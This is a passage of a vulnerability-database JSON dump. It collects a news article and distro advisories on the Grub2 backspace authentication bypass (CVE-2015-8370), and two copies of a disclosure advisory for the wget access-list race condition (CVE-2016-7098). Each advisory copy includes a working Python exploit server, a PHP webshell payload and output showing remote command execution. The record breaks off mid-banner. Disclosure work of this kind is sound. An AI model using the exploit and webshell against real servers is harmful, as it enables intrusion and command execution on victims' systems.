during boot-up just by pressing backspace key 28 times.\n\n \n\n\n \n\n\nThis time, the issue is neither in a kernel nor in an operating system itself, but rather the vulnerability actually resides in **Grub2**, the popular **_Grand Unified Bootloader_**, which is used by most Linux systems to boot the operating system when the PC starts.\n\n \n**Also Read:** [GPU-based Linux Rootkit and Keylogger](<https://thehackernews.com/2015/05/gpu-rootkit-linux-Keylogger.html>). \n \n\n\nThe source of the vulnerability is nothing but an integer underflow fault that was introduced with single commit in Grub version 1.98 (December 2009) \u2013 _b391bdb2f2c5ccf29da66cecdbfb7566656a704d _\u2013 affecting the_ grub_password_get() _function.\n\n \n\n\n### Here's How to Exploit the Linux Vulnerability\n\n \n\n\nIf your computer system is vulnerable to this bug:\n\n \n\n\nJust hit the backspace key 28 times at the Grub username prompt during power-up. This will open a \"**Grub rescue shell**\" under Grub2 versions 1.98 to version 2.02.\n\n \n\n\nThis rescue shell allows unauthenticated access to a computer and the ability to load another environment.\n\n \n\n\nFrom this shell, an attacker could gain access to all the data on your computer, and can misuse it to steal or delete all the data, or install persistent malware or rootkit, according to researchers **Ismael Ripoll** and **Hector Marco**, who [published](<http://hmarco.org/bugs/CVE-2015-8370-Grub2-authentication-bypass.html#exploit>) their research on Tuesday.\n\n \n\n\n### Here's How to Protect Linux System\n\n \n\n\nThe Grub vulnerability affects Linux systems from December 2009 to the present date, though older Linux systems may also be affected. \n \n**Also Read:** [Is This Security-Focused Linux Kernel Really UnHackable?](<https://thehackernews.com/2015/09/linux-secure-operating-system.html>)\n\n \n\n\nThe good news is the researchers have made an emergency patch to fix the Grub2 vulnerability. So if you are a Linux user and worried your system might be vulnerable, you can apply this emergency patch, [available here](<http://hmarco.org/bugs/patches/0001-Fix-CVE-2015-8370-Grub2-user-pass-vulnerability.patch>).\n\n \n\n\nMeanwhile, many major distributions, including [Ubuntu](<https://lists.ubuntu.com/archives/ubuntu-security-announce/2015-December/003218.html>), [Red Hat](<https://rhn.redhat.com/errata/RHSA-2015-2623.html>), and [Debian](<https://security-tracker.debian.org/tracker/CVE-2015-8370>) have also released emergency patches to fix the issue.\n\n \n\n\nLinux is often thought to be a super secure operating system compare to others, and this Grub vulnerability could be a good reminder that it's high time to take physical security just as seriously as network security.\n", "modified": "2015-12-17T10:17:29", "published": "2015-12-16T22:33:00", "id": "THN:960C1B9817E3CB5C4AF1E8867B27BE72", "href": "https://thehackernews.com/2015/12/hack-linux-grub-password.html", "type": "thn", "title": "You can Hack into a Linux Computer just by pressing 'Backspace' 28 times", "cvss": {"score": 6.9, "vector": "AV:LOCAL/AC:MEDIUM/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}], "gentoo": [{"lastseen": "2016-09-06T19:46:39", "bulletinFamily": "unix", "description": "### Background\n\nGNU GRUB is a multiboot boot loader used by most Linux systems.\n\n### Description\n\nAn integer underflow in GRUB\u2019s username/password authentication code has been discovered. \n\n### Impact\n\nAn attacker with access to the system console may bypass the username prompt by entering a sequence of backspace characters, allowing them e.g. to get full access to GRUB\u2019s console or to load a customized kernel. \n\n### Workaround\n\nThere is no known workaround at this time.\n\n### Resolution\n\nAll GRUB 2.x users should upgrade to the latest version:\n \n \n # emerge --sync\n # emerge --ask --oneshot --verbose \">=sys-boot/grub-2.02_beta2-r8\"\n \n\nAfter upgrading, make sure to run the grub2-install command with options appropriate for your system. See the GRUB2 Quick Start guide in the references below for examples. Your system will be vulnerable until this action is performed.", "modified": "2015-12-19T00:00:00", "published": "2015-12-19T00:00:00", "id": "GLSA-201512-03", "href": "https://security.gentoo.org/glsa/201512-03", "type": "gentoo", "title": "GRUB: Authentication bypass", "cvss": {"score": 6.9, "vector": "AV:LOCAL/AC:MEDIUM/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}], "zdt": [{"lastseen": "2018-01-01T07:02:08", "bulletinFamily": "exploit", "description": "Exploit for multiple platform in category remote exploits", "modified": "2016-11-24T00:00:00", "published": "2016-11-24T00:00:00", "href": "https://0day.today/exploit/description/26413", "id": "1337DAY-ID-26413", "type": "zdt", "title": "GNU Wget < 1.18 - Access List Bypass / Race Condition Vulnerabilities", "sourceData": "'''\r\n=============================================\r\n- Discovered by: Dawid Golunski\r\n- dawid[at]legalhackers.com\r\n- https://legalhackers.com\r\n- https://legalhackers.com/advisories/Wget-Exploit-ACL-bypass-RaceCond-CVE-2016-7098.html\r\n \r\n- CVE-2016-7098\r\n- Release date: 24.11.2016\r\n- Revision 1.0\r\n- Severity: Medium\r\n=============================================\r\n \r\n \r\nI. VULNERABILITY\r\n-------------------------\r\n \r\nGNU Wget < 1.18 Access List Bypass / Race Condition\r\n \r\n \r\nII. BACKGROUND\r\n-------------------------\r\n \r\n\"GNU Wget is a free software package for retrieving files using HTTP, HTTPS and \r\nFTP, the most widely-used Internet protocols. \r\nIt is a non-interactive commandline tool, so it may easily be called from \r\nscripts, cron jobs, terminals without X-Windows support, etc.\r\n \r\nGNU Wget has many features to make retrieving large files or mirroring entire \r\nweb or FTP sites easy\r\n\"\r\n \r\nhttps://www.gnu.org/software/wget/\r\n \r\n \r\nIII. INTRODUCTION\r\n-------------------------\r\n \r\nGNU wget in version 1.17 and earlier, when used in mirroring/recursive mode, \r\nis affected by a Race Condition vulnerability that might allow remote attackers \r\nto bypass intended wget access list restrictions specified with -A parameter.\r\nThis might allow attackers to place malicious/restricted files onto the system. \r\nDepending on the application / download directory, this could potentially lead \r\nto other vulnerabilities such as code execution etc.\r\n \r\n \r\nIV. DESCRIPTION\r\n-------------------------\r\n \r\nWhen wget is used in recursive/mirroring mode, according to the manual it can \r\ntake the following access list options:\r\n \r\n\"Recursive Accept/Reject Options:\r\n -A acclist --accept acclist\r\n -R rejlist --reject rejlist\r\n \r\nSpecify comma-separated lists of file name suffixes or patterns to accept or \r\nreject. Note that if any of the wildcard characters, *, ?, [ or ], appear in \r\nan element of acclist or rejlist, it will be treated as a pattern, rather \r\nthan a suffix.\"\r\n \r\n \r\nThese can for example be used to only download JPG images. \r\n \r\nIt was however discovered that when a single file is requested with recursive \r\noption (-r / -m) and an access list ( -A ), wget only applies the checks at the\r\nend of the download process. \r\n \r\nThis can be observed in the output below:\r\n \r\n# wget -r -nH -A '*.jpg' http://attackersvr/test.php\r\nResolving attackersvr... 192.168.57.1\r\nConnecting to attackersvr|192.168.57.1|:80... connected.\r\nHTTP request sent, awaiting response... 200 OK\r\nLength: unspecified [text/plain]\r\nSaving to: \u00e2\u20ac\u02dctest.php\u00e2\u20ac\u2122\r\n \r\n15:05:46 (27.3 B/s) - \u00e2\u20ac\u02dctest.php\u00e2\u20ac\u2122 saved [52]\r\n \r\nRemoving test.php since it should be rejected.\r\n \r\nFINISHED\r\n \r\n \r\nAlthough wget deletes the file at the end of the download process, this creates \r\na race condition as an attacker with control over the URL/remote server could \r\nintentionally slow down the download process so that they had a chance to make \r\nuse of the malicious file before it gets deleted.\r\n \r\nIt is very easy to win the race as the file only gets deleted after the HTTP \r\nconnection is terminated. The attacker could therefore keep the connection open \r\nas long as it was necessary to make use of the uploaded file as demonstrated\r\nin the proof of concept below.\r\n \r\n \r\nV. PROOF OF CONCEPT EXPLOIT\r\n------------------------------\r\n \r\n \r\nHere is a simple vulnerable PHP web application that uses wget to download \r\nimages from a user-provided server/URL:\r\n \r\n \r\n---[ image_importer.php ]---\r\n \r\n<?php\r\n // Vulnerable webapp [image_importer.php]\r\n // Uses wget to import user images from provided site URL \r\n // It only accepts JPG files (-A wget option).\r\n \r\n if ( isset($_GET['imgurl']) ) {\r\n $URL = escapeshellarg($_GET['imgurl']);\r\n } else {\r\n die(\"imgurl parameter missing\");\r\n }\r\n \r\n if ( !file_exists(\"image_uploads\") ) {\r\n mkdir(\"image_uploads\");\r\n }\r\n \r\n // Download user JPG images into /image_uploads directory\r\n system(\"wget -r -nH -P image_uploads -A '*.jpg' $URL 2>&1\");\r\n?>\r\n \r\n \r\n----------------------------\r\n \r\n \r\nFor example:\r\nhttps://victimsvr/image_importer.php?imgurl= href=\"http://images/logo.jpg\">http://images/logo.jpg\r\n \r\nwill cause wget to upload logo.jpg file into:\r\nhttps://victimsvr/images_uploads/logo.jpg\r\n \r\nThe wget access list (-A) is to ensure that only .jpg files get uploaded.\r\n \r\nHowever due to the wget race condition vulnerability an attacker could use \r\nthe exploit below to upload an arbitrary PHP script to /image_uploads directory\r\nand achieve code execution.\r\n \r\n \r\n---[ wget-race-exploit.py ]---\r\n'''\r\n \r\n#!/usr/bin/env python\r\n \r\n#\r\n# Wget < 1.18 Access List Bypass / Race Condition PoC Exploit\r\n# CVE-2016-7098\r\n#\r\n# Dawid Golunski\r\n# https://legalhackers.com\r\n#\r\n#\r\n# This PoC wget exploit can be used to bypass wget -A access list and upload a malicious\r\n# file for long enough to take advantage of it.\r\n# The exploit sets up a web server on port 80 and waits for a download request from wget.\r\n# It then supplies a PHP webshell payload and requests the uploaded file before it gets\r\n# removed by wget. \r\n#\r\n# Adjust target URL (WEBSHELL_URL) before executing.\r\n# \r\n# Full advisory at:\r\n#\r\n# https://legalhackers.com/advisories/Wget-Exploit-ACL-bypass-RaceCond-CVE-2016-7098.html\r\n#\r\n# Disclaimer:\r\n#\r\n# For testing purposes only. Do no harm.\r\n#\r\n# \r\n \r\nimport SimpleHTTPServer\r\nimport time\r\nimport SocketServer\r\nimport urllib2\r\nimport sys\r\n \r\nHTTP_LISTEN_IP = '0.0.0.0'\r\nHTTP_LISTEN_PORT = 80\r\n \r\nPAYLOAD='''\r\n<?php\r\n //our webshell\r\n system($_GET[\"cmd\"]);\r\n system(\"touch /tmp/wgethack\");\r\n?>\r\n'''\r\n \r\n# Webshell URL to be requested before the connection is closed \r\n# i.e before the uploaded \"temporary\" file gets removed.\r\nWEBSHELL_URL=\"http://victimsvr/image_uploads/webshell.php\"\r\n \r\n# Command to be executed through 'cmd' GET paramter of the webshell\r\nCMD=\"/usr/bin/id\"\r\n \r\n \r\nclass wgetExploit(SimpleHTTPServer.SimpleHTTPRequestHandler):\r\n def do_GET(self):\r\n # Send the payload on GET request\r\n print \"[+] Got connection from wget requesting \" + self.path + \" via GET :)\\n\"\r\n self.send_response(200)\r\n self.send_header('Content-type', 'text/plain')\r\n self.end_headers()\r\n self.wfile.write(PAYLOAD)\r\n print \"\\n[+] PHP webshell payload was sent.\\n\"\r\n \r\n # Wait for the file to be flushed to disk on remote host etc.\r\n print \"[+} Sleep for 2s to make sure the file has been flushed to the disk on the target...\\n\"\r\n time.sleep(2)\r\n \r\n # Request uploaded webshell\r\n print \"[+} File '\" + self.path + \"' should be saved by now :)\\n\"\r\n print \"[+} Executing \" + CMD + \" via webshell URL: \" + WEBSHELL_URL + \"?cmd=\" + CMD + \"\\n\"\r\n print \"[+} Command result: \"\r\n print urllib2.urlopen(WEBSHELL_URL+\"?cmd=\"+CMD).read()\r\n \r\n print \"[+} All done. Closing HTTP connection...\\n\"\r\n # Connection will be closed on request handler return\r\n return\r\n \r\nhandler = SocketServer.TCPServer((HTTP_LISTEN_IP, HTTP_LISTEN_PORT), wgetExploit)\r\n \r\nprint \"\\nWget < 1.18 Access List Bypass / Race Condition PoC Exploit \\nCVE-2016-7098\\n\\nDawid Golunski \\nhttps://legalhackers.com \\n\"\r\nprint \"[+} Exploit Web server started on HTTP port %s. Waiting for wget to connect...\\n\" % HTTP_LISTEN_PORT\r\n \r\nhandler.serve_forever()\r\n \r\n'''\r\n------------------------------\r\n \r\nIf the attacker run this exploit on their server ('attackersver') and pointed \r\nthe vulnerable script image_importer.php at it via URL:\r\n \r\nhttps://victimsvr/image_importer.php?imgurl= href=\"http://attackersvr/webshell.php\">http://attackersvr/webshell.php\r\n \r\nThe attacker will see output similar to:\r\n \r\n \r\n \r\n[email\u00a0protected]:~# ./wget-race-exploit.py \r\n \r\nWget < 1.18 Access List Bypass / Race Condition PoC Exploit \r\nCVE-2016-7098\r\n \r\nDawid Golunski \r\nhttps://legalhackers.com \r\n \r\n[+} Exploit Web server started on HTTP port 80. Waiting for wget to connect...\r\n \r\n[+] Got connection from wget requesting /webshell.php via GET :)\r\n \r\nvictimsvr - - [24/Nov/2016 00:46:18] \"GET /webshell.php HTTP/1.1\" 200 -\r\n \r\n[+] PHP webshell payload was sent.\r\n \r\n[+} Sleep for 2s to make sure the file has been flushed to the disk on the target...\r\n \r\n[+} File '/webshell.php' should be saved by now :)\r\n \r\n[+} Executing /usr/bin/id via webshell URL: http://victimsvr/image_uploads/webshell.php?cmd=/usr/bin/id\r\n \r\n[+} Command result: \r\n \r\nuid=33(www-data) gid=33(www-data) groups=33(www-data),1002(nagcmd)\r\n \r\n[+} All done. Closing HTTP connection...\r\n \r\n \r\n \r\nVI. BUSINESS IMPACT\r\n-------------------------\r\n \r\nThe vulnerability might allow remote servers to bypass intended wget access list \r\nrestrictions to temporarily store a malicious file on the server. \r\nIn certain cases, depending on the context wget command was used in and download\r\npath, this issue could potentially lead to other vulnerabilities such as\r\nscript execution as shown in the PoC section.\r\n \r\nVII. SYSTEMS AFFECTED\r\n-------------------------\r\n \r\nWget < 1.18\r\n \r\nVIII. SOLUTION\r\n-------------------------\r\n \r\nUpdate to latest version of wget 1.18 or apply patches provided by the vendor.\r\n \r\nIX. REFERENCES\r\n-------------------------\r\n \r\nhttps://legalhackers.com\r\n \r\nhttps://legalhackers.com/advisories/Wget-Exploit-ACL-bypass-RaceCond-CVE-2016-7098.html\r\n \r\nhttps://legalhackers.com/exploits/CVE-2016-7098/wget-race-exploit.py\r\n \r\nhttps://www.gnu.org/software/wget/\r\n \r\nhttps://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2016-7098\r\n \r\nhttps://security-tracker.debian.org/tracker/CVE-2016-7098\r\n \r\nhttp://lists.opensuse.org/opensuse-updates/2016-09/msg00044.html\r\n \r\nhttp://lists.gnu.org/archive/html/bug-wget/2016-08/msg00124.html\r\n \r\nhttps://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2016-7098\r\n \r\n \r\nX. CREDITS\r\n-------------------------\r\n \r\nThe vulnerability has been discovered by Dawid Golunski\r\ndawid (at) legalhackers (dot) com\r\n \r\nhttps://legalhackers.com\r\n \r\nXI. REVISION HISTORY\r\n-------------------------\r\n \r\n24.11.2016 - Advisory released\r\n \r\nXII. LEGAL NOTICES\r\n-------------------------\r\n \r\nThe information contained within this advisory is supplied \"as-is\" with\r\nno warranties or guarantees of fitness of use or otherwise. I accept no\r\nresponsibility for any damage caused by the use or misuse of this information.\r\n'''\n\n# 0day.today [2018-01-01] #", "sourceHref": "https://0day.today/exploit/26413", "cvss": {"score": 6.8, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}}], "exploitdb": [{"lastseen": "2016-11-24T21:23:09", "bulletinFamily": "exploit", "description": "GNU Wget < 1.18 - Access List Bypass / Race Condition. CVE-2016-7098. Remote exploit for Multiple platform", "modified": "2016-11-24T00:00:00", "published": "2016-11-24T00:00:00", "id": "EDB-ID:40824", "href": "https://www.exploit-db.com/exploits/40824/", "type": "exploitdb", "title": "GNU Wget < 1.18 - Access List Bypass / Race Condition", "sourceData": "'''\r\n=============================================\r\n- Discovered by: Dawid Golunski\r\n- dawid[at]legalhackers.com\r\n- https://legalhackers.com\r\n- https://legalhackers.com/advisories/Wget-Exploit-ACL-bypass-RaceCond-CVE-2016-7098.html\r\n\r\n- CVE-2016-7098\r\n- Release date: 24.11.2016\r\n- Revision 1.0\r\n- Severity: Medium\r\n=============================================\r\n\r\n\r\nI. VULNERABILITY\r\n-------------------------\r\n\r\nGNU Wget < 1.18 Access List Bypass / Race Condition\r\n\r\n\r\nII. BACKGROUND\r\n-------------------------\r\n\r\n\"GNU Wget is a free software package for retrieving files using HTTP, HTTPS and \r\nFTP, the most widely-used Internet protocols. \r\nIt is a non-interactive commandline tool, so it may easily be called from \r\nscripts, cron jobs, terminals without X-Windows support, etc.\r\n\r\nGNU Wget has many features to make retrieving large files or mirroring entire \r\nweb or FTP sites easy\r\n\"\r\n\r\nhttps://www.gnu.org/software/wget/\r\n\r\n\r\nIII. INTRODUCTION\r\n-------------------------\r\n\r\nGNU wget in version 1.17 and earlier, when used in mirroring/recursive mode, \r\nis affected by a Race Condition vulnerability that might allow remote attackers \r\nto bypass intended wget access list restrictions specified with -A parameter.\r\nThis might allow attackers to place malicious/restricted files onto the system. \r\nDepending on the application / download directory, this could potentially lead \r\nto other vulnerabilities such as code execution etc.\r\n\r\n\r\nIV. DESCRIPTION\r\n-------------------------\r\n\r\nWhen wget is used in recursive/mirroring mode, according to the manual it can \r\ntake the following access list options:\r\n\r\n\"Recursive Accept/Reject Options:\r\n -A acclist --accept acclist\r\n -R rejlist --reject rejlist\r\n\r\nSpecify comma-separated lists of file name suffixes or patterns to accept or \r\nreject. Note that if any of the wildcard characters, *, ?, [ or ], appear in \r\nan element of acclist or rejlist, it will be treated as a pattern, rather \r\nthan a suffix.\"\r\n\r\n\r\nThese can for example be used to only download JPG images. \r\n\r\nIt was however discovered that when a single file is requested with recursive \r\noption (-r / -m) and an access list ( -A ), wget only applies the checks at the\r\nend of the download process. \r\n\r\nThis can be observed in the output below:\r\n\r\n# wget -r -nH -A '*.jpg' http://attackersvr/test.php\r\nResolving attackersvr... 192.168.57.1\r\nConnecting to attackersvr|192.168.57.1|:80... connected.\r\nHTTP request sent, awaiting response... 200 OK\r\nLength: unspecified [text/plain]\r\nSaving to: \u00e2\u20ac\u02dctest.php\u00e2\u20ac\u2122\r\n\r\n15:05:46 (27.3 B/s) - \u00e2\u20ac\u02dctest.php\u00e2\u20ac\u2122 saved [52]\r\n\r\nRemoving test.php since it should be rejected.\r\n\r\nFINISHED\r\n\r\n\r\nAlthough wget deletes the file at the end of the download process, this creates \r\na race condition as an attacker with control over the URL/remote server could \r\nintentionally slow down the download process so that they had a chance to make \r\nuse of the malicious file before it gets deleted.\r\n\r\nIt is very easy to win the race as the file only gets deleted after the HTTP \r\nconnection is terminated. The attacker could therefore keep the connection open \r\nas long as it was necessary to make use of the uploaded file as demonstrated\r\nin the proof of concept below.\r\n\r\n\r\nV. PROOF OF CONCEPT EXPLOIT\r\n------------------------------\r\n\r\n\r\nHere is a simple vulnerable PHP web application that uses wget to download \r\nimages from a user-provided server/URL:\r\n\r\n\r\n---[ image_importer.php ]---\r\n\r\n<?php\r\n // Vulnerable webapp [image_importer.php]\r\n // Uses wget to import user images from provided site URL \r\n // It only accepts JPG files (-A wget option).\r\n\r\n if ( isset($_GET['imgurl']) ) {\r\n $URL = escapeshellarg($_GET['imgurl']);\r\n } else {\r\n die(\"imgurl parameter missing\");\r\n }\r\n\r\n if ( !file_exists(\"image_uploads\") ) {\r\n mkdir(\"image_uploads\");\r\n }\r\n\r\n // Download user JPG images into /image_uploads directory\r\n system(\"wget -r -nH -P image_uploads -A '*.jpg' $URL 2>&1\");\r\n?>\r\n\r\n\r\n----------------------------\r\n\r\n\r\nFor example:\r\nhttps://victimsvr/image_importer.php?imgurl= href=\"http://images/logo.jpg\">http://images/logo.jpg\r\n\r\nwill cause wget to upload logo.jpg file into:\r\nhttps://victimsvr/images_uploads/logo.jpg\r\n\r\nThe wget access list (-A) is to ensure that only .jpg files get uploaded.\r\n\r\nHowever due to the wget race condition vulnerability an attacker could use \r\nthe exploit below to upload an arbitrary PHP script to /image_uploads directory\r\nand achieve code execution.\r\n\r\n\r\n---[ wget-race-exploit.py ]---\r\n'''\r\n\r\n#!/usr/bin/env python\r\n\r\n#\r\n# Wget < 1.18 Access List Bypass / Race Condition PoC Exploit\r\n# CVE-2016-7098\r\n#\r\n# Dawid Golunski\r\n# https://legalhackers.com\r\n#\r\n#\r\n# This PoC wget exploit can be used to bypass wget -A access list and upload a malicious\r\n# file for long enough to take advantage of it.\r\n# The exploit sets up a web server on port 80 and waits for a download request from wget.\r\n# It then supplies a PHP webshell payload and requests the uploaded file before it gets\r\n# removed by wget. \r\n#\r\n# Adjust target URL (WEBSHELL_URL) before executing.\r\n# \r\n# Full advisory at:\r\n#\r\n# https://legalhackers.com/advisories/Wget-Exploit-ACL-bypass-RaceCond-CVE-2016-7098.html\r\n#\r\n# Disclaimer:\r\n#\r\n# For testing purposes only. Do no harm.\r\n#\r\n# \r\n\r\nimport SimpleHTTPServer\r\nimport time\r\nimport SocketServer\r\nimport urllib2\r\nimport sys\r\n\r\nHTTP_LISTEN_IP = '0.0.0.0'\r\nHTTP_LISTEN_PORT = 80\r\n\r\nPAYLOAD='''\r\n<?php\r\n\t//our webshell\r\n\tsystem($_GET[\"cmd\"]);\r\n\tsystem(\"touch /tmp/wgethack\");\r\n?>\r\n'''\r\n\r\n# Webshell URL to be requested before the connection is closed \r\n# i.e before the uploaded \"temporary\" file gets removed.\r\nWEBSHELL_URL=\"http://victimsvr/image_uploads/webshell.php\"\r\n\r\n# Command to be executed through 'cmd' GET paramter of the webshell\r\nCMD=\"/usr/bin/id\"\r\n\r\n\r\nclass wgetExploit(SimpleHTTPServer.SimpleHTTPRequestHandler):\r\n def do_GET(self):\r\n # Send the payload on GET request\r\n print \"[+] Got connection from wget requesting \" + self.path + \" via GET :)\\n\"\r\n self.send_response(200)\r\n self.send_header('Content-type', 'text/plain')\r\n self.end_headers()\r\n self.wfile.write(PAYLOAD)\r\n print \"\\n[+] PHP webshell payload was sent.\\n\"\r\n\r\n # Wait for the file to be flushed to disk on remote host etc.\r\n print \"[+} Sleep for 2s to make sure the file has been flushed to the disk on the target...\\n\"\r\n time.sleep(2)\r\n\r\n # Request uploaded webshell\r\n print \"[+} File '\" + self.path + \"' should be saved by now :)\\n\"\r\n print \"[+} Executing \" + CMD + \" via webshell URL: \" + WEBSHELL_URL + \"?cmd=\" + CMD + \"\\n\"\r\n print \"[+} Command result: \"\r\n print urllib2.urlopen(WEBSHELL_URL+\"?cmd=\"+CMD).read()\r\n\r\n print \"[+} All done. Closing HTTP connection...\\n\"\r\n # Connection will be closed on request handler return\r\n return\r\n\r\nhandler = SocketServer.TCPServer((HTTP_LISTEN_IP, HTTP_LISTEN_PORT), wgetExploit)\r\n\r\nprint \"\\nWget < 1.18 Access List Bypass / Race Condition PoC Exploit \\nCVE-2016-7098\\n\\nDawid Golunski \\nhttps://legalhackers.com \\n\"\r\nprint \"[+} Exploit Web server started on HTTP port %s. Waiting for wget to connect...\\n\" % HTTP_LISTEN_PORT\r\n\r\nhandler.serve_forever()\r\n\r\n'''\r\n------------------------------\r\n\r\nIf the attacker run this exploit on their server ('attackersver') and pointed \r\nthe vulnerable script image_importer.php at it via URL:\r\n\r\nhttps://victimsvr/image_importer.php?imgurl= href=\"http://attackersvr/webshell.php\">http://attackersvr/webshell.php\r\n\r\nThe attacker will see output similar to:\r\n\r\n\r\n\r\nroot@attackersvr:~# ./wget-race-exploit.py \r\n\r\nWget < 1.18 Access List Bypass / Race Condition PoC Exploit \r\nCVE-2016-7098\r\n\r\nDawid Golunski \r\nhttps://legalhackers.com \r\n\r\n[+} Exploit Web server started on HTTP port 80. Waiting for wget to connect...\r\n\r\n[+] Got connection from wget requesting /webshell.php via GET :)\r\n\r\nvictimsvr - - [24/Nov/2016 00:46:18] \"GET /webshell.php HTTP/1.1\" 200 -\r\n\r\n[+] PHP webshell payload was sent.\r\n\r\n[+} Sleep for 2s to make sure the file has been flushed to the disk on the target...\r\n\r\n[+} File '/webshell.php' should be saved by now :)\r\n\r\n[+} Executing /usr/bin/id via webshell URL: http://victimsvr/image_uploads/webshell.php?cmd=/usr/bin/id\r\n\r\n[+} Command result: \r\n\r\nuid=33(www-data) gid=33(www-data) groups=33(www-data),1002(nagcmd)\r\n\r\n[+} All done. Closing HTTP connection...\r\n\r\n\r\n\r\nVI. BUSINESS IMPACT\r\n-------------------------\r\n\r\nThe vulnerability might allow remote servers to bypass intended wget access list \r\nrestrictions to temporarily store a malicious file on the server. \r\nIn certain cases, depending on the context wget command was used in and download\r\npath, this issue could potentially lead to other vulnerabilities such as\r\nscript execution as shown in the PoC section.\r\n \r\nVII. SYSTEMS AFFECTED\r\n-------------------------\r\n\r\nWget < 1.18\r\n \r\nVIII. SOLUTION\r\n-------------------------\r\n\r\nUpdate to latest version of wget 1.18 or apply patches provided by the vendor.\r\n \r\nIX. REFERENCES\r\n-------------------------\r\n\r\nhttps://legalhackers.com\r\n\r\nhttps://legalhackers.com/advisories/Wget-Exploit-ACL-bypass-RaceCond-CVE-2016-7098.html\r\n\r\nhttps://legalhackers.com/exploits/CVE-2016-7098/wget-race-exploit.py\r\n\r\nhttps://www.gnu.org/software/wget/\r\n\r\nhttps://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2016-7098\r\n\r\nhttps://security-tracker.debian.org/tracker/CVE-2016-7098\r\n\r\nhttp://lists.opensuse.org/opensuse-updates/2016-09/msg00044.html\r\n\r\nhttp://lists.gnu.org/archive/html/bug-wget/2016-08/msg00124.html\r\n\r\nhttps://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2016-7098\r\n\r\n\r\nX. CREDITS\r\n-------------------------\r\n\r\nThe vulnerability has been discovered by Dawid Golunski\r\ndawid (at) legalhackers (dot) com\r\n\r\nhttps://legalhackers.com\r\n \r\nXI. REVISION HISTORY\r\n-------------------------\r\n\r\n24.11.2016 - Advisory released\r\n \r\nXII. LEGAL NOTICES\r\n-------------------------\r\n\r\nThe information contained within this advisory is supplied \"as-is\" with\r\nno warranties or guarantees of fitness of use or otherwise. I accept no\r\nresponsibility for any damage caused by the use or misuse of this information.\r\n'''", "cvss": {"score": 6.8, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}, "sourceHref": "https://www.exploit-db.com/download/40824/"}], "debian": [{"lastseen": "2020-01-30T02:30:20", "bulletinFamily": "unix", "description": "Package : wget\nVersion : 1.16-1+deb8u7\nCVE ID : CVE-2016-7098\n\n\nAn issue has been found in wget, a tool to retrieve files from the web.\nA race condition might occur as files rejected by an access list are kept \non the disk for the duration of a HTTP connection.\n\n\n\nFor Debian 8 "Jessie", this problem has been fixed in version\n1.16-1+deb8u7.\n\nWe recommend that you upgrade your wget packages.\n\nFurther information about Debian LTS security advisories, how to apply\nthese updates to your system and frequently asked questions can be\nfound at: https://wiki.debian.org/LTS\n", "modified": "2020-01-29T22:00:28", "published": "2020-01-29T22:00:28", "id": "DEBIAN:DLA-2086-1:7FDEC", "href": "https://lists.debian.org/debian-lts-announce/2020/debian-lts-announce-202001/msg00031.html", "title": "[SECURITY] [DLA 2086-1] wget security update", "type": "debian", "cvss": {"score": 6.8, "vector": "AV:N/AC:M/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2019-05-30T02:22:02", "bulletinFamily": "unix", "description": "Package : grub2\nVersion : 1.98+20100804-14+squeeze2\nCVE ID : CVE-2015-8370\nDebian Bug : #807614\n\nHector Marco-Gisbert, from the Universitat Polit\u00e8cnica de Val\u00e8ncia\nCybersecurity Team, reported a buffer overflow in grub2 when checking password\nduring bootup.\n\nFor Debian 6 "Squeeze", this problem has been fixed in grub2 version\n1.98+20100804-14+squeeze2. We recommend you to upgrade your grub2\npackages.\n\nLearn more about the Debian Long Term Support (LTS) Project and how to\napply these updates at: https://wiki.debian.org/LTS/\n", "modified": "2015-12-12T17:36:05", "published": "2015-12-12T17:36:05", "id": "DEBIAN:DLA-368-1:37E52", "href": "https://lists.debian.org/debian-lts-announce/2015/debian-lts-announce-201512/msg00009.html", "title": "[SECURITY] [DLA 368-1] grub2 security update", "type": "debian", "cvss": {"score": 6.9, "vector": "AV:L/AC:M/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2019-05-30T02:22:46", "bulletinFamily": "unix", "description": "- -------------------------------------------------------------------------\nDebian Security Advisory DSA-3421-1 security@debian.org\nhttps://www.debian.org/security/ Luciano Bello\nDecember 16, 2015 https://www.debian.org/security/faq\n- -------------------------------------------------------------------------\n\nPackage : grub2\nCVE ID : CVE-2015-8370\nDebian Bug : 807614\n\nHector Marco and Ismael Ripoll, from Cybersecurity UPV Research Group,\nfound an integer underflow vulnerability in Grub2, a popular bootloader.\nA local attacker can bypass the Grub2 authentication by inserting a\ncrafted input as username or password.\n\nMore information:\nhttp://hmarco.org/bugs/CVE-2015-8370-Grub2-authentication-bypass.html\n\nFor the oldstable distribution (wheezy), this problem has been fixed\nin version 1.99-27+deb7u3.\n\nFor the stable distribution (jessie), this problem has been fixed in\nversion 2.02~beta2-22+deb8u1.\n\nFor the unstable distribution (sid), this problem has been fixed in\nversion 2.02~beta2-33.\n\nWe recommend that you upgrade your grub2 packages.\n\nFurther information about Debian Security Advisories, how to apply\nthese updates to your system and frequently asked questions can be\nfound at: https://www.debian.org/security/\n\nMailing list: debian-security-announce@lists.debian.org\n", "modified": "2015-12-16T20:06:12", "published": "2015-12-16T20:06:12", "id": "DEBIAN:DSA-3421-1:06317", "href": "https://lists.debian.org/debian-security-announce/debian-security-announce-2015/msg00327.html", "title": "[SECURITY] [DSA 3421-1] grub2 security update", "type": "debian", "cvss": {"score": 6.9, "vector": "AV:L/AC:M/Au:N/C:C/I:C/A:C"}}], "packetstorm": [{"lastseen": "2016-12-05T22:13:08", "bulletinFamily": "exploit", "description": "", "modified": "2016-11-24T00:00:00", "published": "2016-11-24T00:00:00", "href": "https://packetstormsecurity.com/files/139895/GNU-Wget-Access-List-Bypass-Race-Condition.html", "id": "PACKETSTORM:139895", "type": "packetstorm", "title": "GNU Wget Access List Bypass / Race Condition", "sourceData": "` __ __ __ __ __ \n/ / ___ ____ _____ _/ / / / / /___ ______/ /_____ __________ \n/ / / _ \\/ __ `/ __ `/ / / /_/ / __ `/ ___/ //_/ _ \\/ ___/ ___/ \n/ /___/ __/ 